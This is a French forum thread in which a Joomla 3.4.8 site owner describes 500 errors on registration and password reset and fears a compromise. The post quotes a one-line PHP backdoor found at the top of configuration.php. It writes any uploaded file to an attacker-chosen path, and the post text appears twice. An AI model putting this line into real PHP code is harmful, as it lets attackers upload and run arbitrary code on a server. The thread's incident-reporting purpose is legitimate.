Tweet
Bonjour à tous !
Depuis quelques jours et sans raison apparente, un de mes sites Joomla affiche une erreur 500 à chaque inscription ou reset du mot de passe ou de l'identifiant.
Pas de souci pour la connexion.
En front, lors d'une tentative d'inscription, erreur 500 et pas d'inscription.
En back, lors d'une tentative d'inscription, erreur 500 mais l'inscription est prise en compte.
Lors d'un reset de mot de passe ou d'identifiant, si c'est fait à partir de l'email d'un utilisateur lamda, erreur 500 mais l'utilisateur est bien désactivé (quand je vais voir en back).
Il restera désactivé puisque l'erreur 500 l'empêche de finaliser la ré-initialisation.
Lors d'un reset de mot de passe ou d'identifiant, si je m'amuse à tester avec une adresse email inexistante, j'ai bien le message d'erreur qui va bien.
Si j'essaie avec l'email du super-utilisateur, là encore, j'ai bien un autre message d'erreur correct.
C'est bizarre, il y a encore 5 jours un utilisateur s'est correctement inscrit en front. Depuis mon site n'a subi aucun changement, pas de MAJ, rien.
Mon hébergeur a des voyants qui clignotent assez vite généralement, quand nous subissons des attaques (site institutionnel...). Mais rien de son coté pour l'instant.
Mais je crains très fortement d'avoir été attaqué, car grâce aux logs de mon hébergeur (pas les logs Joomla) j'ai retrouvé tout en haut du fichier configuration.php, juste avant la "class Jconfig", cette ligne là :
Depuis que je l'ai supprimée, j'ai l'impression d'un léger mieux (le "détail" des erreurs 500 mentionne de belles URL, et pas les "...itemid..."), mais ça ne corrige pas le problème.
Et les logs sont aveugles pour l'instant.
Please qu'en pensez-vous ? C'est la panique à bord ici !!!! J'ai des PJ privées, des RIB, bref c'est chaud !
Joomla 3.4.8
PHP 5.5.12
Certes je redirige le formulaire d'inscription avec le CCK Fabrik, mais dans les règles de l'art, je ne pense pas que l'extension soit responsable.
Merci d'avance pour le moindre conseil, REX ou avis !
Depuis quelques jours et sans raison apparente, un de mes sites Joomla affiche une erreur 500 à chaque inscription ou reset du mot de passe ou de l'identifiant.
Pas de souci pour la connexion.
En front, lors d'une tentative d'inscription, erreur 500 et pas d'inscription.
En back, lors d'une tentative d'inscription, erreur 500 mais l'inscription est prise en compte.
Lors d'un reset de mot de passe ou d'identifiant, si c'est fait à partir de l'email d'un utilisateur lamda, erreur 500 mais l'utilisateur est bien désactivé (quand je vais voir en back).
Il restera désactivé puisque l'erreur 500 l'empêche de finaliser la ré-initialisation.
Lors d'un reset de mot de passe ou d'identifiant, si je m'amuse à tester avec une adresse email inexistante, j'ai bien le message d'erreur qui va bien.
Si j'essaie avec l'email du super-utilisateur, là encore, j'ai bien un autre message d'erreur correct.
C'est bizarre, il y a encore 5 jours un utilisateur s'est correctement inscrit en front. Depuis mon site n'a subi aucun changement, pas de MAJ, rien.
Mon hébergeur a des voyants qui clignotent assez vite généralement, quand nous subissons des attaques (site institutionnel...). Mais rien de son coté pour l'instant.
Mais je crains très fortement d'avoir été attaqué, car grâce aux logs de mon hébergeur (pas les logs Joomla) j'ai retrouvé tout en haut du fichier configuration.php, juste avant la "class Jconfig", cette ligne là :
Code:
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}
Et les logs sont aveugles pour l'instant.
Please qu'en pensez-vous ? C'est la panique à bord ici !!!! J'ai des PJ privées, des RIB, bref c'est chaud !
Joomla 3.4.8
PHP 5.5.12
Certes je redirige le formulaire d'inscription avec le CCK Fabrik, mais dans les règles de l'art, je ne pense pas que l'extension soit responsable.
Merci d'avance pour le moindre conseil, REX ou avis !
J'ai ce dernier outil mais je le garde pour mes prestations de nettoyage; il n'est pas téléchargeable.
Commentaire